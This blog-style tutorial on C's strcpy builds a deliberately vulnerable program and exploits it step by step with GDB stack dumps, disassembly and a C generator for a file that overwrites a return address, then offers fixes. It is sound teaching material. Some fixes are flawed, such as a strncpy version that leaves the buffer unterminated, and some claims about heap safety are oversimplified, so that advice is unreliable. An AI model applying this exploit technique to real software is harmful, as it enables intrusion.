strcpy
Really?Published: 5/6/2025
strcpy
If you have done any amount of programming in C
, you will most likely have
heard that you shouldn't use functions like strcpy
, strcat
,
sprintf
,
etc., due to them being unsafe and very easily susceptible to buffer overflow
attacks. While true, and fantastic advice for new programmers,
like any dangerous tool, in the hands of a trained professional, there
isn't much to worry about. When talking about C/C++
, people like to
bring up how easy it is to shoot yourself in the foot. In this example,
functions like strcpy
are merely the gun; the programmer is the one that
pulls the trigger. Like with firearm safety, if handled and used properly,
firearms can't hurt anyone. Just like with functions like strcpy
, if used
correctly, they can't cause buffer overflows. In this blog post, we take a
look at how buffer overflows are exploited when functions like strcpy
are
used without the proper safety mechanisms, as well as how to properly
implement said functions to prevent buffer overflows.
strcpy
Let's assume we have a simple C
program that takes in a filename as input,
reads in that file, and then determines if the contents of that file are a
string.
NOTE: The following code to check if an
unsigned char
array is a string is just for demonstration purposes and has been overly simplified for brevity.
Here is what such a program could look like:
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
unsigned char *loadfile(const char *filename, size_t *size)
{
/* Code to read in a file */
}
int is_uchar_str(unsigned char *data)
{
char tmp[20];
strcpy(tmp, (char *) data);
return isalpha(tmp[0]);
}
int main(int argc, char **argv)
{
unsigned char *data = NULL;
size_t size = 0;
if (argc < 2)
{
printf("Usage: %s \n", argv[0]);
return EXIT_FAILURE;
}
data = loadfile(argv[1], &size);
if (data == NULL)
return EXIT_FAILURE;
if (is_uchar_str(data))
printf("String: %s\n", (char *) data);
else
printf("%s is binary\n", argv[1]);
free(data);
return EXIT_SUCCESS;
}
For brevity's sake, I have omitted the code to handle the reading in of the file. However, let us assume that the function is not susceptible to any sort of buffer overflow attack. If you haven't already found the buffer overflow, it's these lines right here:
char tmp[20];
strcpy(tmp, (char *) data);
The reason this can cause a buffer overflow is that we are blindly copying
data
, which has an unknown size, into a fixed-size buffer. If data
happens to be larger than 20 bytes
, this will cause a buffer overflow.
This is because strcpy
does not do any bounds checking to make sure the
buffer you are copying into is large enough to hold the incoming data.
However, just because a buffer overflow can occur doesn't mean it will. Let us compile and run our program and see what happens:
$ gcc -g main.c -o main
$ ./main test
Read in 7 bytes from test
String: aaaaaa
Here, we can see we read in a file, test
, and it contained six a's plus
a new line for a total of seven bytes. Obviously, 7 < 20
, so there's no
way a buffer overflow could happen with this specific file.
As we discussed in the section above, our example program is vulnerable to a buffer overflow attack.
In short, a buffer overflow is what happens when a program writes data to a buffer that goes beyond its allocated space and corrupts surrounding memory. Used maliciously, buffer overflows can be exploited to inject and execute arbitrary code. One of the ways this is done is by overwriting the return address of a function in order to jump to the hacker's injected code and execute it.
The reason buffer overflow attacks are so dangerous is because
any code injected by the hacker will run at the permission level of the
program itself. This means if a hacker exploits a program running with
root
(or administrative) privileges, any arbitrary code they execute will
also run with those same privileges. So, if a hacker exploits a buffer
overflow in a program running as root
and injects code to spawn a reverse
shell, the hacker now has free reign to do whatever they please on that
system.
Let's now assume our example program has a secret function that we want to execute that we otherwise can't by using the program normally.
void secret(void)
{
printf("This should never print\n");
}
If we didn't have the source code to see this function existed, we could
still find it by running objdump
on our program.
$ objdump -d main
.
.
00000000000012a9 :
12a9: f3 0f 1e fa endbr64
12ad: 55 push %rbp
12ae: 48 89 e5 mov %rsp,%rbp
12b1: 48 8d 05 50 0d 00 00 lea 0xd50(%rip),%rax # 2008 <_IO_stdin_used+0x8>
12b8: 48 89 c7 mov %rax,%rdi
12bb: e8 60 fe ff ff call 1120
12c0: 90 nop
12c1: 5d pop %rbp
12c2: c3 re
.
.
Here, we can see that a function named secret
exists within our program
but is inaccessible to us. Since we know this program is vulnerable to a
buffer overflow, we can exploit that buffer overflow in order to have this
program run the secret
function.
I have also done a couple of preliminary steps to disable common protections like Address Space Layout Randomization (ASLR), StackGuard, Canary Words, etc. You can still perform buffer overflows without these disabled, but for the sake of simplicity and consistency for this demo, I have disabled them.
First, let's run our program through a debugger, like GDB
, to get a sense
of the memory space and how to craft our exploit.
In GDB
, if we run layout src
, we can see the function we want to
exploit.
So, let's add a breakpoint at line 58
, right before our function returns,
and look at the current state of the stack.
(gdb) b 58
Breakpoint 1 at 0x1418: file main.c, line 58.
(gdb) r test
Starting program: /home/main test
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Read in 7 bytes from test
Breakpoint 1, is_uchar_str (data=0x55555555a490 "aaaaaa\n") at main.c:58
58 return isalpha(tmp[0]);
(gdb) x/32x $rsp
0x7fffffffe2f0: 0x00000000 0x00000000 0x5555a490 0x00005555
0x7fffffffe300: 0x61616161 0x000a6161 0x00000007 0x00000000
0x7fffffffe310: 0x5555a490 0x00005555 0x555592a0 0x00005555
0x7fffffffe320: 0xffffe350 0x00007fff 0x555554b5 0x00005555
0x7fffffffe330: 0xffffe468 0x00007fff 0x00000000 0x00000002
0x7fffffffe340: 0x00000000 0x00000000 0x5555a490 0x00005555
0x7fffffffe350: 0x00000002 0x00000000 0xf7c29d90 0x00007fff
0x7fffffffe360: 0x00000000 0x00000000 0x5555543b 0x00005555
(gdb)
What we just did was run the program with our test
file and dump the
current layout of the stack at our breakpoint. On the line starting with
0x7fffffffe300
, we can see that those are our a
's, since 0x61
is the ASCII encoding for a
in hexadecimal. Looking deeper, we can see that the
line starting with 0x7fffffffe320
contains our return address. Due to the
endianness, or the way in which the bytes are ordered, we have to flip the
numbers, but we can see our return address is 0x00005555555554b5
.
How do we know this? We can confirm this by disassembling our main
function in GDB
by running disas main
. Which gives us this:
.
.
0x00005555555554a9 <+110>: mov -0x8(%rbp),%rax
0x00005555555554ad <+114>: mov %rax,%rdi
0x00005555555554b0 <+117>: call 0x5555555553f5
0x00005555555554b5 <+122>: test %eax,%eax
0x00005555555554b7 <+124>: je 0x5555555554d4
0x00005555555554b9 <+126>: mov -0x8(%rbp),%rax
.
.
We can see that the function we are currently in, is_uchar_str
, is at
address 0x00005555555554b0
and the next instruction is at address
0x00005555555554b5
. That's how we know from our stack dump that
0x00005555555554b5
was our return address.
All we have to do now is create a malicious file that overwrites that return
address with the address of the secret
function. To find this, we can run
disas secret
:
Dump of assembler code for function secret:
0x00005555555552a9 <+0>: endbr64
0x00005555555552ad <+4>: push %rbp
0x00005555555552ae <+5>: mov %rsp,%rbp
0x00005555555552b1 <+8>: lea 0xd50(%rip),%rax # 0x555555556008
0x00005555555552b8 <+15>: mov %rax,%rdi
0x00005555555552bb <+18>: call 0x555555555120
0x00005555555552c0 <+23>: nop
0x00005555555552c1 <+24>: pop %rbp
0x00005555555552c2 <+25>: ret
End of assembler dump.
Here, we can see the address of the secret
function is
0x00005555555552a9
, so that is what we want to put for our return
address in order to execute the secret
function.
Going back to the stack dump:
(gdb) x/32x $rsp
0x7fffffffe2f0: 0x00000000 0x00000000 0x5555a490 0x00005555
0x7fffffffe300: 0x61616161 0x000a6161 0x00000007 0x00000000
0x7fffffffe310: 0x5555a490 0x00005555 0x555592a0 0x00005555
0x7fffffffe320: 0xffffe350 0x00007fff 0x555554b5 0x00005555
0x7fffffffe330: 0xffffe468 0x00007fff 0x00000000 0x00000002
0x7fffffffe340: 0x00000000 0x00000000 0x5555a490 0x00005555
0x7fffffffe350: 0x00000002 0x00000000 0xf7c29d90 0x00007fff
0x7fffffffe360: 0x00000000 0x00000000 0x5555543b 0x00005555
We can see that there are 40 bytes
between the start of our buffer and
the return address. In order to generate our malicious file, I wrote a
simple C
program to generate it for us:
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
int main(int argc, char **argv)
{
size_t size = 56; /* Larger than what we realistically need */
int off = 0x28; /* Offset in the buffer where the return address is */
char buffer[size];
FILE *badfile;
/* Initialize buffer with all 'a' */
memset(&buffer, 0x61, size);
/* Return address to overwrite */
*((long *) (buffer + off)) = 0x00005555555552a9;
/* Save the contents to the file "badfile" */
badfile = fopen("./badfile", "w");
fwrite(buffer, size, 1, badfile);
fclose(badfile);
}
NOTE:
0x28
in hexadecimal is 40 in decimal (or base 10).
Compiling and running that program, we now have our malicious file that
will allow us to exploit the buffer overflow and run the secret
function.
Let's run it and see what happens.
Bada bing bada boom! Our buffer overflow exploit was a success, and the
secret
function was executed. In case you're curious, the reason the
Illegal instruction (core dumped)
message appeared is because we did not
properly handle what happens after our exploit happens. Especially in this
basic example, where the program would exit anyway, this doesn't really
matter. However, for more sophisticated attacks, adding in the proper
handling for what happens after the exploit would matter.
Now that we have proven we can exploit this program via a buffer overflow,
how do we fix it? Sure, you can change the is_uchar_str
to use strncpy
,
as seen here:
/* Old */
int is_uchar_str(unsigned char *data)
{
char tmp[20];
strcpy(tmp, (char *) data);
return isalpha(tmp[0]);
}
/* New */
int is_uchar_str(unsigned char *data)
{
size_t size = 20;
char tmp[size + 1];
strncpy(tmp, (char *) data, size);
return isalpha(tmp[0]);
}
While that would absolutely fix the problem, the point of this is to show
how you can use strcpy
and still be safe. The better solution, while still
using strcpy
, would be to add the size of the incoming data as a
parameter. After that, it would be best practice to allocate memory on the
heap, rather than creating a fixed-size buffer on the stack. The primary
reason for this is that the stack is much more limited in how much memory
it can hold compared to the heap. Similarly, if you allocate the memory on
the heap, the hacker can't simply overrun your buffer and overwrite the
return address, like they can in our example.
With all that in mind, our new function would look something like this:
int is_uchar_str(unsigned char *data, size_t size)
{
char *tmp = calloc(size + 1, sizeof(char));
int ret = 0; /* 0 = false */
if (tmp == NULL)
return ret;
strcpy(tmp, (char *) data);
ret = isalpha(tmp[0]);
free(tmp);
return ret;
}
Since we updated our is_uchar_str
function by adding an additional
parameter, we have to update our main function as well:
int main(int argc, char **argv)
{
unsigned char *data = NULL;
size_t size = 0;
if (argc < 2)
{
printf("Usage: %s \n", argv[0]);
return EXIT_FAILURE;
}
data = loadfile(argv[1], &size);
if (data == NULL)
return EXIT_FAILURE;
if (is_uchar_str(data, size))
printf("String: %s\n", (char *) data);
else
printf("%s is binary\n", argv[1]);
free(data);
return EXIT_SUCCESS;
}
With these changes, if we recompile the program (even with all the protections disabled), try as we might, we won't be able to perform a buffer overflow:
Even running our program through Valgrind
, we can see we have no memory
leaks or errors.
In our example, yes; but globally, no. If our is_uchar_str
function was
a part of an API or library, it would technically still be vulnerable to a
buffer overflow under the right conditions. I.e., the same conditions that
make strcpy
susceptible to a buffer overflow: negligence on behalf of the
developer calling it. Let's look at it again:
int is_uchar_str(unsigned char *data, size_t size)
{
char *tmp = calloc(size + 1, sizeof(char));
int ret = 0; /* 0 = false */
if (tmp == NULL)
return ret;
strcpy(tmp, (char *) data);
ret = isalpha(tmp[0]);
free(tmp);
return ret;
}
If the developer fails to provide the adequate size of the data coming in,
a buffer overflow can still occur. However, the same holds true if you use
strncpy
or strncat
, for example, just in reverse.
In our case, if the size is too small, we won't allocate enough space, and
the buffer will overflow. In the case of strncpy
and strncat
, if the
size you give is larger than the buffer you're copying/concatenating into,
you can still have a buffer overflow. Though, granted, the range in which a
hacker could overflow the buffer, theoretically, would be more limited.
As we've clearly demonstrated, using functions like strcpy
, strcat
,
sprintf
, etc., can be done without any risk of a buffer overflow
occurring. However, like we mentioned in the beginning,
comparing these functions to firearms, developers must ensure they are
taking the requisite steps to ensure their buffers are large enough to
receive any incoming data. Which, in fairness, they should be doing anyway.
One notable exception to this would be if you're working within a protocol
where messages can only be of a certain length. In which case, yes, using
strncpy
would make more sense. The counterargument to that, though, is
that if messages can only be, say, 4096 bytes
long, you don't even need to
use any form of string copying in the first place. You can just check if
the data is less than 4096 bytes
prior to performing strcpy
, since
anything larger is obviously an invalid message and not worth parsing in
the first place.
As a final note, whenever you are working in memory-unsafe languages, like
C/C++
, always ensure you verify your buffers are large enough to
receive the data you plan to put in them prior to copying that data into
said buffer, regardless of if you are using strcpy
or strncpy
. If your
buffer isn't large enough, either resize it or find another way to handle
the exception, for example, like returning an error code.